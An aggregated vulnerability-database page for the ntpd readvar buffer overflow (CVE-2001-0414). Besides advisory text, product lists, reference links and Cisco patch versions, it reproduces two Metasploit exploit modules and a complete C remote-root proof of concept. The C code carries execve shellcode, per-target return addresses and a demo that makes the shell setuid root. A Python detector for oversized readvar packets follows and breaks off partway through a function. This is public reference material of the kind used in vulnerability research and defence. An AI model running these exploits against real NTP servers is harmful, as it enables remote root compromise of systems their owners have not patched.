CVE-2001-0414
CVSS 10.0
Published: 2001-06-18 00:00:00
Revised: 2016-10-17 22:11:05

[Original] Buffer overflow in ntpd ntp daemon 4.0.99k and earlier (aka xntpd and xntp3) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long readvar argument.


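[CNNVD] Ntpd remote buffer overflow vulnerability (CNNVD-200106-110)

        The Network Time Protocol daemon (NTPD) on a variety of Unix/Linux operating systems and Cisco routers is vulnerable to a remote buffer overflow attack.
        Because NTP runs over stateless UDP, malicious request packets can be spoofed to trigger the remote buffer overflow. In the vast majority of cases NTPD is started as root, so a successful remote overflow yields root privileges directly.
        Although this is an ordinary buffer overflow, exploiting it effectively is still fairly difficult. The destination buffer gets damaged for some reason, so by the time the attack completes the buffer actually usable for shellcode is smaller than 70 bytes. The demonstration code below merely executes /tmp/sh, but a complete remote attack can be constructed.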
        

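- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)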

cpe:/a:dave_mills:ntpd:4.0.99
cpe:/a:dave_mills:ntpd:4.0.99i
cpe:/a:dave_mills:ntpd:4.0.99h
cpe:/a:dave_mills:xntp3:5.93
cpe:/a:dave_mills:xntp3:5.93c
cpe:/a:dave_mills:xntp3:5.93e
cpe:/a:dave_mills:ntpd:4.0.99c
cpe:/a:dave_mills:ntpd:4.0.99b
cpe:/a:dave_mills:xntp3:5.93d
cpe:/a:dave_mills:ntpd:4.0.99g
cpe:/a:dave_mills:ntpd:4.0.99f
cpe:/a:dave_mills:ntpd:4.0.99a
cpe:/a:dave_mills:ntpd:4.0.99k
cpe:/a:dave_mills:ntpd:4.0.99j
cpe:/a:dave_mills:xntp3:5.93b
cpe:/a:dave_mills:ntpd:4.0.99e
cpe:/a:dave_mills:xntp3:5.93a
cpe:/a:dave_mills:ntpd:4.0.99d

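- OVAL (technical details for detection)

oval:org.mitre.oval:def:5402  Multiple Vendor NTP Buffer Overflow
oval:org.mitre.oval:def:3831  Buffer Overflow in ntp Daemon via readvar
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definitions.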

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0414
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-110
(Official data source) CNNVD

- Other links and resources

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:31.ntpd.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:31
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2001-004.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2001-004
ftp://ftp.sco.com/SSE/sse073.ltr
(UNKNOWN)  SCO  SSE073
ftp://ftp.sco.com/SSE/sse074.ltr
(UNKNOWN)  SCO  SSE074
http://archives.neohapsis.com/archives/bugtraq/2001-04/0127.html
(UNKNOWN)  BUGTRAQ  20010409 [ESA-20010409-01] xntp buffer overflow
http://archives.neohapsis.com/archives/bugtraq/2001-04/0225.html
(UNKNOWN)  BUGTRAQ  20010413 PROGENY-SA-2001-02A: [UPDATE] ntpd remote buffer overflow
http://archives.neohapsis.com/archives/bugtraq/2001-04/0314.html
(UNKNOWN)  BUGTRAQ  20010418 IBM MSS Outside Advisory Redistribution: IBM AIX: Buffer Overflow Vulnerability in (x)ntp
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000392
(UNKNOWN)  CONECTIVA  CLA-2001:392
http://lists.suse.com/archives/suse-security-announce/2001-Apr/0000.html
(UNKNOWN)  SUSE  SuSE-SA:2001:10
http://marc.info/?l=bugtraq&m=98642418618512&w=2
(UNKNOWN)  BUGTRAQ  20010404 ntpd =< 4.0.99k remote buffer overflow
http://marc.info/?l=bugtraq&m=98651866104663&w=2
(UNKNOWN)  DEBIAN  DSA-045
http://marc.info/?l=bugtraq&m=98654963328381&w=2
(UNKNOWN)  BUGTRAQ  20010405 Re: ntpd =< 4.0.99k remote buffer overflow]
http://marc.info/?l=bugtraq&m=98659782815613&w=2
(UNKNOWN)  BUGTRAQ  20010406 Immunix OS Security update for ntp and xntp3
http://marc.info/?l=bugtraq&m=98679815917014&w=2
(UNKNOWN)  BUGTRAQ  20010408 [slackware-security] buffer overflow fix for NTP
http://marc.info/?l=bugtraq&m=98683952401753&w=2
(UNKNOWN)  BUGTRAQ  20010409 ntp-4.99k23.tar.gz is available
http://marc.info/?l=bugtraq&m=98684202610470&w=2
(UNKNOWN)  BUGTRAQ  20010409 PROGENY-SA-2001-02: ntpd remote buffer overflow
http://marc.info/?l=bugtraq&m=98684532921941&w=2
(UNKNOWN)  BUGTRAQ  20010409 ntpd - new Debian 2.2 (potato) version is also vulnerable
http://www.calderasystems.com/support/security/advisories/CSSA-2001-013.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-013
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-036.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:036
http://www.redhat.com/support/errata/RHSA-2001-045.html
(UNKNOWN)  REDHAT  RHSA-2001:045
http://www.securityfocus.com/bid/2540
(VENDOR_ADVISORY)  BID  2540
http://xforce.iss.net/static/6321.php
(UNKNOWN)  XF  ntpd-remote-bo(6321)

- Vulnerability information

Ntpd remote buffer overflow vulnerability
Critical  Boundary condition error
2001-06-18 00:00:00 2005-05-02 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Cisco
        -----
        Cisco has published a security advisory (Cisco-NTP) and corresponding patches for this issue:
        Cisco-NTP: Cisco Security Advisory: NTP Vulnerability
        Link:
        http://www.cisco.com/warp/public/707/NTP-pub.shtml

        Patch downloads:
        Cisco IOS 10.3:
        Cisco IOS 11.0:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.1 IA:
         Cisco Upgrade IOS 12.2(3)
        Cisco IOS 11.1 CT:
         Cisco Upgrade IOS 12.0ST
        Cisco IOS 11.1 CC:
         Cisco Upgrade IOS 11.1(36)CC2
        Cisco IOS 11.1 CA:
        Cisco IOS 11.1 AA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.1:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 XA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 WA4:
         Cisco Upgrade IOS 12.0W
        Cisco IOS 11.2 SA:
         Cisco Upgrade IOS 12.0W
        Cisco IOS 11.2 P:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 GS:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 F:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.2 BC:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.2:
         Cisco Upgrade IOS 11.2(26a)
        Cisco IOS 11.3 XA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 WA4:
         Cisco Upgrade IOS 12.0WA
        Cisco IOS 11.3 T:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 NA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3 MA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3 HA:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 11.3 DB:
         Cisco Upgrade IOS 12.1DB
        Cisco IOS 11.3 DA:
         Cisco Upgrade IOS 12.1DA
        Cisco IOS 11.3 AA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 11.3:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 12.0 XV:
         Cisco Upgrade IOS 12.2(4)
        Cisco IOS 12.0 XU:
         Cisco Upgrade IOS 12.0WC
        Cisco IOS 12.0 XS:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.0 XR:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.0 XQ:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XP:
         Cisco Upgrade IOS 12.0WC
        Cisco IOS 12.0 XN:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XM:
         Cisco Upgrade IOS 12.0(5)YB4
        Cisco IOS 12.0 XL:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XJ:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XI:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XH:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XG:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XF:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XE:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.0 XD:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XC:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XB:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 XA:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 WT:
        Cisco IOS 12.0 WC:
         Cisco Upgrade IOS 12.0(5)WC2
        Cisco IOS 12.0 T:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.0 ST:
         Cisco Upgrade IOS 12.0(17)ST1
        Cisco IOS 12.0 SL:
         Cisco Upgrade IOS 12.0(17)SL2
         Cisco Upgrade IOS 12.0ST
        Cisco IOS 12.0 SC:
         Cisco Upgrade IOS 12.0(16)SC
        Cisco IOS 12.0 S:
         Cisco Upgrade IOS 12.0(18)S
        Cisco IOS 12.0 DC:
         Cisco Upgrade IOS 12.1DC
        Cisco IOS 12.0 DB:
         Cisco Upgrade IOS 12.1(5)DB2
        Cisco IOS 12.0 DA:
         Cisco Upgrade IOS 12.1(7)DA2
        Cisco IOS 12.0 (7)XK:
        Cisco IOS 12.0 (5)XK:
        Cisco IOS 12.0 (14)W5(20):
         Cisco Upgrade IOS 12.0(18)W5(22)
        Cisco IOS 12.0 (13)W5(19c):
         Cisco Upgrade IOS 12.0(16)W5(21)
        Cisco IOS 12.0 (10)W5(18g):
         Cisco Upgrade IOS 12.0(18)W5(22a)
        Cisco IOS 12.0:
         Cisco Upgrade IOS 12.0(18)
        Cisco IOS 12.1 YF:
         Cisco Upgrade IOS 12.1(5)YF2
        Cisco IOS 12.1 YD:
         Cisco Upgrade IOS 12.1(5)YD2
        Cisco IOS 12.1 YC:
         Cisco Upgrade IOS 12.1(5)YC1
        Cisco IOS 12.1 YB:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 YA:
        Cisco IOS 12.1 XZ:
        Cisco IOS 12.1 XY:
        Cisco IOS 12.1 XX:
        Cisco IOS 12.1 XW:
         Cisco Upgrade IOS 12.2DD
        Cisco IOS 12.1 XV:
         Cisco Upgrade IOS 12.1(5)XV3
        Cisco IOS 12.1 XU:
         Cisco Upgrade IOS 12.2(2)XA
        Cisco IOS 12.1 XT:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XS:
         Cisco Upgrade IOS 12.1(5)XS2
        Cisco IOS 12.1 XR:
         Cisco Upgrade IOS 12.1(5)YD2
        Cisco IOS 12.1 XQ:
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XP:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XM:
         Cisco Upgrade IOS 12.1(5)XM4
        Cisco IOS 12.1 XL:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XK:
        Cisco IOS 12.1 XJ:
         Cisco Upgrade IOS 12.1(5)YB4
        Cisco IOS 12.1 XI:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XH:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XG:
        Cisco IOS 12.1 XF:
         Cisco Upgrade IOS 12.1(2)XF4
        Cisco IOS 12.1 XE:
        Cisco IOS 12.1 XD:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XC:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 XB:
        Cisco IOS 12.1 XA:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 T:
         Cisco Upgrade IOS 12.2(3)
         Cisco Upgrade IOS 12.1(5)T9
         Cisco Upgrade IOS 12.2(1b)
        Cisco IOS 12.1 EZ:
         Cisco Upgrade IOS 12.1(6)EZ2
        Cisco IOS 12.1 EY:
         Cisco Upgrade IOS 12.1(6)EY
        Cisco IOS 12.1 EX:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.1 EC:
         Cisco Upgrade IOS 12.1(7)EC
        Cisco IOS 12.1 E:
         Cisco Upgrade IOS 12.1(8a)E
        Cisco IOS 12.1 DC:
         Cisco Upgrade IOS 12.2(2)B
        Cisco IOS 12.1 DB:
         Cisco Upgrade IOS 12.2(2)B
        Cisco IOS 12.1 DA:
         Cisco Upgrade IOS 12.1(7)DA2
        Cisco IOS 12.1 CX:
         Cisco Upgrade IOS 12.1(7)CX
        Cisco IOS 12.1 AA:
         Cisco Upgrade IOS 12.1(9)AA
        Cisco IOS 12.1:
         Cisco Upgrade IOS 12.1(9)
        Cisco IOS 12.2 XQ:
         Cisco Upgrade IOS 12.2(1)XQ
        Cisco IOS 12.2 XH:
         Cisco Upgrade IOS 12.2(1)XH
        Cisco IOS 12.2 XE:
         Cisco Upgrade IOS 12.2(1)XE
        Cisco IOS 12.2 XD:
         Cisco Upgrade IOS 12.2(1)XD1
        Cisco IOS 12.2 XA:
         Cisco Upgrade IOS 12.2(2)XA1
         Cisco Upgrade IOS 12.2(2)XA
        Cisco IOS 12.2 T:
         Cisco Upgrade IOS 12.2(4)T
        Cisco IOS 12.2 S:
         Cisco Upgrade IOS 12.2(1.4)S
        Cisco IOS 12.2 PI:
        

- Vulnerability information (16285)

NTP daemon readvar Buffer Overflow (EDBID:16285)
linux remote
2010-08-25 Verified
0 metasploit
##
# $Id: ntp_overflow.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NTP daemon readvar Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow in the
				ntpd and xntpd service. By sending an overly long 'readvar'
				request it is possible to execute code remotely. As the stack
				is corrupted, this module uses the Egghunter technique.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
						[ 'CVE', '2001-0414' ],
						[ 'OSVDB', '805' ],
						[ 'BID', '2540' ],
						[ 'US-CERT-VU', '970472' ],
				],
			'Payload'        =>
				{
					'Space'    => 220,
					'BadChars' => "\x00\x01\x02\x16,=",
					'StackAdjustment' => -3500,
					'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
					'Compat'   =>
					{
						'ConnectionType' => '-reverse',
					},
				},
			'Platform'       => [ 'linux' ],
			'Arch'		 => [ ARCH_X86 ],
			'Targets'        =>
				[
						[ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
						#[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
						[ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 04 2001',
			'DefaultTarget' => 0))

		register_options([Opt::RPORT(123)], self.class)
	end

	def exploit

		hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg     = hunter[1]

		connect_udp

		pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
		pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

		sploit =  pkt1 + make_nops(512 - pkt1.length)
		sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
		sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

		print_status("Trying target #{target.name}...")

		print_status("Sending hunter")
		udp_sock.put(sploit)
		select(nil,nil,nil,0.5)

		print_status("Sending payload")
		udp_sock.put(pkt1 + egg)
		select(nil,nil,nil,0.5)

		print_status("Calling overflow trigger")
		udp_sock.put(pkt2)
		select(nil,nil,nil,0.5)

		handler
		disconnect_udp

	end

end
		

- Vulnerability information (20727)

Ntpd Remote Buffer Overflow Vulnerability (EDBID:20727)
linux remote
2001-04-04 Verified
0 babcia padlina ltd
source: http://www.securityfocus.com/bid/2540/info

NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.

On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.

Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.

If successful, the attacker may gain root access on the victim host or may deny NTP service on the affected host.

/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */

/*
 * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
 * to remote buffer overflow attack. It occurs when building response for
 * a query with large readvar argument. In almost all cases, ntpd is running
 * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
 *
 * Although it's a normal buffer overflow, exploiting it is much harder.
 * Destination buffer is accidentally damaged, when attack is performed, so
 * shellcode can't be larger than approx. 70 bytes. This proof of concept code
 * uses small execve() shellcode to run /tmp/sh binary. Full remote attack
 * is possible.
 *
 * NTP is stateless UDP based protocol, so all malicious queries can be
 * spoofed.
 *
 * Example of use on generic RedHat 7.0 box:
 *
 * [venglin@cipsko venglin]$ cat dupa.c
 * main() { setreuid(0,0); system("chmod 4755 /bin/sh");  }
 * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
 * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
 * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
 * ntpdx v1.0 by venglin@freebsd.lublin.pl
 * 
 * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
 *
 * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
 * [1] <- evil query (pkt = 512 | shell = 45)
 * [2] <- null query (pkt = 12)
 * Done.
 * /tmp/sh was spawned.
 * [venglin@cipsko venglin]$ ls -al /bin/bash
 * -rwsr-xr-x    1 root     root       512540 Aug 22  2000 /bin/bash
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>

#define NOP	0x90
#define ADDRS	8
#define PKTSIZ	512

static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";

/* generic execve() shellcodes */

char lin_execve[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

char bsd_execve[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

struct platforms
{
	char *os;
	char *version;
	char *code;
	long ret;
	int align;
	int shalign;
	int port;
};

/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet 
 * *after* RET address. These values will vary from platform to platform.
 */

struct platforms targ[] =
{
	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff8bc, 200, 220, 0 },

	{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
		0xbfbff540, 200, 220, 0 },

	{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
		0xbffff777, 240, 160, 0 },

	{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};

long getip(name)
char *name;
{
	struct hostent *hp;
	long ip;
	extern int h_errno;

	if ((ip = inet_addr(name)) < 0)
	{
		if (!(hp = gethostbyname(name)))
		{
			fprintf(stderr, "gethostbyname(): %s\n",
				strerror(h_errno));
			exit(1);
		}
		memcpy(&ip, (hp->h_addr), 4);
	}

	return ip;
}

int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
	/* tcpdump-based reverse engineering :)) */

	char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
		      0x74, 0x75, 0x6d, 0x3d };

	char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
		      0x00, 0x00, 0x00, 0x00 };

	char buf[PKTSIZ], *p;
	long *ap;
	int i;

	int sockfd;
	struct sockaddr_in sa;

	bzero(&sa, sizeof(sa));

	sa.sin_family = AF_INET;
	sa.sin_port = htons(123);
	sa.sin_addr.s_addr = getip(host);

	if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
	{
		perror("socket");
		return -1;
	}

	if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
	{
		perror("connect");
		close(sockfd);
		return -1;
	}

	memset(buf, NOP, PKTSIZ);
	memcpy(buf, q2, sizeof(q2));

	p = buf + align;
	ap = (unsigned long *)p;
                
	for(i=0;i<ADDRS/4;i++)
		*ap++ = ret;

	p = (char *)ap;

	memcpy(buf+shalign, shellcode, strlen(shellcode));

	if((write(sockfd, buf, PKTSIZ)) < 0)
	{
		perror("write");
		close(sockfd);
		return -1;
	}

	fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
		strlen(shellcode));
	fflush(stderr);

        if ((write(sockfd, q3, sizeof(q3))) < 0)
        {
                perror("write");
                close(sockfd);
                return -1;
        }

	fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
	fflush(stderr);

	close(sockfd);

	return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
	extern int optind, opterr;
	extern char *optarg;
	int ch, type, ofs, i;
	long ret;

	opterr = ofs = 0;
	type = -1;

	while ((ch = getopt(argc, argv, "t:o:")) != -1)
		switch((char)ch)
		{
			case 't':
				type = atoi(optarg);
				break;

			case 'o':
				ofs = atoi(optarg);
				break;

			case '?':
			default:
				puts(usage);
				exit(0);

		}

	argc -= optind;
	argv += optind;

	fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");

	if (type < 0)
	{
		fprintf(stderr, "Please select platform:\n");
		for (i=0;targ[i].os;i++)
		{
			fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
			targ[i].os, targ[i].version, (void *)targ[i].ret);
		}

		exit(0);
	}

	fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
			targ[type].os, targ[type].version);

	ret = targ[type].ret;
	ret += ofs;

	if (argc != 1)
	{
		puts(usage);
		exit(0);
	}

	fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
		(void *)ret, targ[type].align, targ[type].shalign);

	if (doquery(*argv, ret, targ[type].code, targ[type].align,
		targ[type].shalign) < 0)
	{
		fprintf(stderr, "Failed.\n");
		exit(1);
	}

	fprintf(stderr, "Done.\n");

	if (!targ[type].port)
	{
		fprintf(stderr, "/tmp/sh was spawned.\n");
		exit(0);
	}

	exit(0);
}
		

- Vulnerability information (F82268)

NTPd Buffer Overflow (PacketStormID:F82268)
2009-10-27 00:00:00
patrick  metasploit.com
exploit,overflow
CVE-2001-0414

This Metasploit module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NTP daemon readvar Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow in the
				ntpd and xntpd service. By sending an overly long 'readvar'
				request it is possible to execute code remotely. As the stack
				is corrupted, this module uses the Egghunter technique.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
						[ 'CVE', '2001-0414' ],
						[ 'OSVDB', '805' ],
						[ 'BID', '2540' ],
						[ 'URL', 'http://www.kb.cert.org/vuls/id/970472' ],
				],
			'Payload'        =>
				{
					'Space'    => 220,
					'BadChars' => "\x00\x01\x02\x16,=",
					'StackAdjustment' => -3500,
					'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
					'Compat'   => 
					{
						'ConnectionType' => '-reverse',
					},
				},
			'Platform'       => [ 'linux' ],
			'Arch'		 => [ ARCH_X86 ],
			'Targets'        =>
				[
						[ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
						[ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
						#[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
						[ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 04 2001',
			'DefaultTarget' => 0))

			register_options([Opt::RPORT(123)], self.class)
	end

	def exploit

		hunter  = generate_egghunter
		egg     = hunter[1]

		connect_udp

		pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
		pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

		sploit =  pkt1 + make_nops(512 - pkt1.length)
		sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
		sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

		print_status("Trying target #{target.name}...")

		print_status("Sending hunter")
		udp_sock.put(sploit)
		sleep(0.5)

		print_status("Sending payload")
		udp_sock.put(pkt1 + egg + egg + payload.encoded)
		sleep(0.5)

		print_status("Calling overflow trigger")
		udp_sock.put(pkt2)
		sleep(0.5)

		handler
		disconnect_udp

	end

end

    

- Vulnerability information

805
NTP ntpd readvar Variable Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in the Network Time Protocol Daemon (ntpd). The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, containing an overly long 'readvar' argument a remote attacker can gain access to root privileges resulting in a loss of integrity.
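
Detection-side illustration of the "overly long 'readvar' argument" described above. This is an added example, not code from the original page or from any of the projects it cites. It parses the NTP mode 6 control-message header (layout per RFC 1305 Appendix B, the same 0x16 0x02 leading bytes seen in the packets on this page) and flags readvar requests whose variable list is oversized, binary, or inconsistent with the count field. The thresholds, function names and sample packets are assumptions constructed for the example.

```python
import struct
from typing import List, NamedTuple, Optional

MODE_CONTROL = 6   # NTP mode 6: control message (RFC 1305, Appendix B)
OP_READVAR = 2     # opcode 2: read variables
HEADER_LEN = 12    # fixed control-message header

# Assumptions: local policy thresholds, not values taken from any advisory.
MAX_ITEM_LEN = 64      # longest single "name[=value]" item tolerated
MAX_TRAILER = 3 + 20   # word padding plus an optional key-id/MAC trailer


class ControlHeader(NamedTuple):
    version: int
    is_response: bool
    opcode: int
    sequence: int
    assoc_id: int
    offset: int
    count: int


def parse_control_header(pkt: bytes) -> Optional[ControlHeader]:
    """Return the mode 6 header, or None if pkt is not a control message."""
    if len(pkt) < HEADER_LEN:
        return None
    b0, b1, seq, _status, assoc, offset, count = struct.unpack(
        "!BBHHHHH", pkt[:HEADER_LEN])
    if b0 & 0x07 != MODE_CONTROL:
        return None
    return ControlHeader((b0 >> 3) & 0x07, bool(b1 & 0x80), b1 & 0x1F,
                         seq, assoc, offset, count)


def inspect_readvar(pkt: bytes) -> List[str]:
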